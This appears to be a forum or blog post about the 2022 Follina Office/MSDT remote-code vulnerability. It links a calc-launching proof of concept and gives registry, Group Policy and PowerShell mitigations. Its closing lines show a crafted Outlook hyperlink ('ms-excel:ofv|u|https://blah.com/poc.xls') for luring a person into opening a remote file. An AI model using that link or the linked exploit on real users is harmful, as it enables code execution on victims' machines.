Posted: . At: 9:06 AM. This was 2 years ago. Post ID: 16358


Microsoft Remote PowerShell exploit in Microsoft Office: a silent threat in 2022.


There is a new threat in Microsoft Office that allows the remote execution of PowerShell code on a target computer. This means that you can download an infected Office document and then be open to an attack from a script that could do anything to your computer. There is a Proof of Concept file here: https://app.box.com/s/9oz1r90tzs7bstl0xy3zzfc8m92cqhcu. This is a sample exploit that opens calc.exe on the target computer, but the payload could be anything.

Microsoft issued a way to patch your system on May 30th 2022, which is essentially this: run Command Prompt as Administrator.

To back up the registry key, execute this command.

reg export HKEY_CLASSES_ROOT\ms-msdt filename

To delete the offending registry key, execute this command.

reg delete HKEY_CLASSES_ROOT\ms-msdt /f

There is also a Group Policy mitigation for the MSDT element, which is really good and easy to deploy:

Group Policy Editor -> Computer Configuration -> Administrative Templates -> System -> Troubleshooting and Diagnostics -> Scripted Diagnostics

Set “Troubleshooting: Allow users to access and run Troubleshooting Wizards” to “disabled”.

This should mitigate this security issue pretty well. This is a serious issue, but it is easily fixed and averted. Do not download suspicious files from the Internet and run them. Apparently, even viewing it as RTF is not safe. Microsoft software is not secure at all. This really needs to be fixed. Even viewing the file in preview in Explorer is not safe…
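The following PowerShell script is an added example, not part of the original post or any Microsoft tooling. It reports whether the ms-msdt handler key is still present and how the Troubleshooting Wizards policy is set, and with `-Apply` it performs the backup-then-delete steps above. The `-Apply` switch, the backup path, and the policy registry value (`EnableDiagnostics` under `ScriptedDiagnostics`) are assumptions of this example.

```powershell
# Added example: audit (and optionally apply) the two mitigations described above.
# -Apply and -BackupPath are parameters of this example script, not of any Microsoft tool.
param(
    [switch]$Apply,
    [string]$BackupPath = "$env:SystemDrive\ms-msdt-backup.reg"   # assumed backup location
)

$handlerKey = 'Registry::HKEY_CLASSES_ROOT\ms-msdt'
# Assumption: registry value written by the policy "Troubleshooting: Allow users to
# access and run Troubleshooting Wizards" (0 = disabled).
$policyKey  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics'
$policyName = 'EnableDiagnostics'

$identity = [Security.Principal.WindowsIdentity]::GetCurrent()
$isAdmin  = ([Security.Principal.WindowsPrincipal]$identity).IsInRole(
                [Security.Principal.WindowsBuiltInRole]::Administrator)

$handlerPresent = Test-Path -LiteralPath $handlerKey
$policyValue = (Get-ItemProperty -Path $policyKey -Name $policyName `
                    -ErrorAction SilentlyContinue).$policyName

# Status report: one object per machine, easy to collect from many hosts.
[pscustomobject]@{
    Computer           = $env:COMPUTERNAME
    MsdtHandlerPresent = $handlerPresent
    WizardsPolicy      = if ($null -eq $policyValue) { 'Not configured' }
                         elseif ($policyValue -eq 0) { 'Disabled' }
                         else { 'Enabled' }
}

if ($Apply -and $handlerPresent) {
    if (-not $isAdmin) { throw 'Run elevated: deleting the key requires Administrator rights.' }

    # Back up first; refuse to delete if the export failed or produced an empty file.
    & reg.exe export 'HKEY_CLASSES_ROOT\ms-msdt' $BackupPath /y | Out-Null
    $backupOk = ($LASTEXITCODE -eq 0) -and (Test-Path -LiteralPath $BackupPath) -and
                ((Get-Item -LiteralPath $BackupPath).Length -gt 0)
    if (-not $backupOk) { throw "Backup to $BackupPath failed; key left in place." }

    & reg.exe delete 'HKEY_CLASSES_ROOT\ms-msdt' /f | Out-Null
    if (Test-Path -LiteralPath $handlerKey) { throw 'ms-msdt key still present after delete.' }

    Write-Output "ms-msdt handler removed. Restore later with: reg import `"$BackupPath`""
}
```

Run it without arguments to audit only; the status object is emitted either way, so the same script can be used to confirm the change afterwards.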

More information on this exploit is here: https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e. You can also use Microsoft Outlook as a target and trick a person into opening an XLS file using a crafted URL.

Just like this.

ms-excel:ofv|u|https://blah.com/poc.xls

A hyperlink crafted with the above text will work in Outlook. Not a good look, Microsoft.
